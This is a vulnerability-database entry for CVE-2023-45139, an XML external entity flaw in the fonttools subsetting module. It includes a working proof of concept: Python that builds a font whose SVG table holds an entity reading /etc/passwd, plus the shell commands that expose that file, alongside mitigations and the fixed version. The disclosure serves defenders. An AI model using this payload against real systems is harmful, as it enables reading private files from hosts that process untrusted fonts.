ghsa-6673-4983-2vx5
Vulnerability from github
Published
2024-01-09 16:01
Modified
2024-05-02 13:09
Summary
fonttools XML External Entity Injection (XXE) Vulnerability
Details

Summary

As of fonttools>=4.28.2 the subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed.

This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system.

PoC

The vulnerability can be reproduced following the bellow steps on a unix based system.

  1. Build a OT-SVG font which includes a external entity in the SVG table which resolves a local file. In our testing we utilised /etc/passwd for our POC file to include and modified an existing subset integration test to build the POC font - see bellow.

```python

from string import ascii_letters from fontTools.fontBuilder import FontBuilder from fontTools.pens.ttGlyphPen import TTGlyphPen from fontTools.ttLib import newTable

XXE_SVG = """\

]> &test; """

def main(): # generate a random TTF font with an SVG table glyph_order = [".notdef"] + list(ascii_letters) pen = TTGlyphPen(glyphSet=None) pen.moveTo((0, 0)) pen.lineTo((0, 500)) pen.lineTo((500, 500)) pen.lineTo((500, 0)) pen.closePath() glyph = pen.glyph() glyphs = {g: glyph for g in glyph_order}

fb = FontBuilder(unitsPerEm=1024, isTTF=True)
fb.setupGlyphOrder(glyph_order)
fb.setupCharacterMap({ord(c): c for c in ascii_letters})
fb.setupGlyf(glyphs)
fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})
fb.setupHorizontalHeader()
fb.setupOS2()
fb.setupPost()
fb.setupNameTable({"familyName": "TestSVG", "styleName": "Regular"})

svg_table = newTable("SVG ")
svg_table.docList = [
   (XXE_SVG, 1, 12)
]
fb.font["SVG "] = svg_table

fb.font.save('poc-payload.ttf')

if name == 'main': main()

```

  1. Subset the font with an affected version of fontTools - we tested on fonttools==4.42.1 and fonttools==4.28.2 - using the following flags (which just ensure the malicious glyph is mapped by the font and not discard in the subsetting process):

shell pyftsubset poc-payload.ttf --output-file="poc-payload.subset.ttf" --unicodes="*" --ignore-missing-glyphs

  1. Read the parsed SVG table in the subsetted font:

shell ttx -t SVG poc-payload.subset.ttf && cat poc-payload.subset.ttx

Observed the included contents of the /etc/passwd file.

Impact

Note the final severity is dependant on the environment fontTools is running in.

  • The vulnerability has the most impact on consumers of fontTools who leverage the subsetting utility to subset untrusted OT-SVG fonts where the vulnerability may be exploited to read arbitrary files from the filesystem of the host fonttools is running on

Possible Mitigations

There may be other ways to mitigate the issue, but some suggestions:

  1. Set the resolve_entities=False flag on parsing methods
  2. Consider further methods of disallowing doctype declarations
  3. Consider recursive regex matching
Show details on source website


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "fonttools"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.28.2"
            },
            {
              "fixed": "4.43.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-45139"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-01-09T16:01:10Z",
    "nvd_published_at": "2024-01-10T16:15:46Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nAs of `fonttools\u003e=4.28.2` the subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. \n\nThis allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. \n\n### PoC\n\n\nThe vulnerability can be reproduced following the bellow steps on a unix based system.\n\n1. Build a OT-SVG font which includes a external entity in the SVG table which resolves a local file. In our testing we utilised `/etc/passwd` for our POC file to include and modified an existing subset integration test to build the POC font - see bellow.\n\n```python\n\nfrom string import ascii_letters\nfrom fontTools.fontBuilder import FontBuilder\nfrom fontTools.pens.ttGlyphPen import TTGlyphPen\nfrom fontTools.ttLib import newTable\n\n\nXXE_SVG = \"\"\"\\\n\u003c?xml version=\"1.0\"?\u003e\n\u003c!DOCTYPE svg [\u003c!ENTITY test SYSTEM \u0027file:///etc/passwd\u0027\u003e]\u003e\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"\u003e\n  \u003cg id=\"glyph1\"\u003e\n    \u003ctext font-size=\"10\" x=\"0\" y=\"10\"\u003e\u0026test;\u003c/text\u003e\n  \u003c/g\u003e\n\u003c/svg\u003e\n\"\"\"\n\ndef main():\n    # generate a random TTF font with an SVG table\n    glyph_order = [\".notdef\"] + list(ascii_letters)\n    pen = TTGlyphPen(glyphSet=None)\n    pen.moveTo((0, 0))\n    pen.lineTo((0, 500))\n    pen.lineTo((500, 500))\n    pen.lineTo((500, 0))\n    pen.closePath()\n    glyph = pen.glyph()\n    glyphs = {g: glyph for g in glyph_order}\n\n    fb = FontBuilder(unitsPerEm=1024, isTTF=True)\n    fb.setupGlyphOrder(glyph_order)\n    fb.setupCharacterMap({ord(c): c for c in ascii_letters})\n    fb.setupGlyf(glyphs)\n    fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})\n    fb.setupHorizontalHeader()\n    fb.setupOS2()\n    fb.setupPost()\n    fb.setupNameTable({\"familyName\": \"TestSVG\", \"styleName\": \"Regular\"})\n\n    svg_table = newTable(\"SVG \")\n    svg_table.docList = [\n       (XXE_SVG, 1, 12)\n    ]\n    fb.font[\"SVG \"] = svg_table\n\n    fb.font.save(\u0027poc-payload.ttf\u0027)\n\nif __name__ == \u0027__main__\u0027:\n    main()\n\n```\n\n2. Subset the font with an affected version of fontTools - we tested on `fonttools==4.42.1` and `fonttools==4.28.2` - using the following flags (which just ensure the malicious glyph is mapped by the font and not discard in the subsetting process):\n\n```shell\npyftsubset poc-payload.ttf --output-file=\"poc-payload.subset.ttf\" --unicodes=\"*\" --ignore-missing-glyphs\n```\n\n3. Read the parsed SVG table in the subsetted font:\n\n```shell\nttx -t SVG poc-payload.subset.ttf \u0026\u0026 cat poc-payload.subset.ttx\n```\n\nObserved the included contents of the `/etc/passwd` file. \n\n### Impact\n\nNote the final severity is dependant on the environment fontTools is running in.\n\n- The vulnerability has the most impact on consumers of fontTools who leverage the subsetting utility to subset untrusted OT-SVG fonts where the vulnerability may be exploited to read arbitrary files from the filesystem of the host fonttools is running on\n\n\n\n### Possible Mitigations \n\nThere may be other ways to mitigate the issue, but some suggestions:\n\n1. Set the `resolve_entities=False` flag on parsing methods\n2. Consider further methods of disallowing doctype declarations\n3. Consider recursive regex matching\n\n",
  "id": "GHSA-6673-4983-2vx5",
  "modified": "2024-05-02T13:09:24Z",
  "published": "2024-01-09T16:01:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45139"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fonttools/fonttools"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fonttools/fonttools/releases/tag/4.43.0"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2024/03/08/2"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2024/03/09/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "fonttools XML External Entity Injection (XXE) Vulnerability"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.


Loading…

Loading…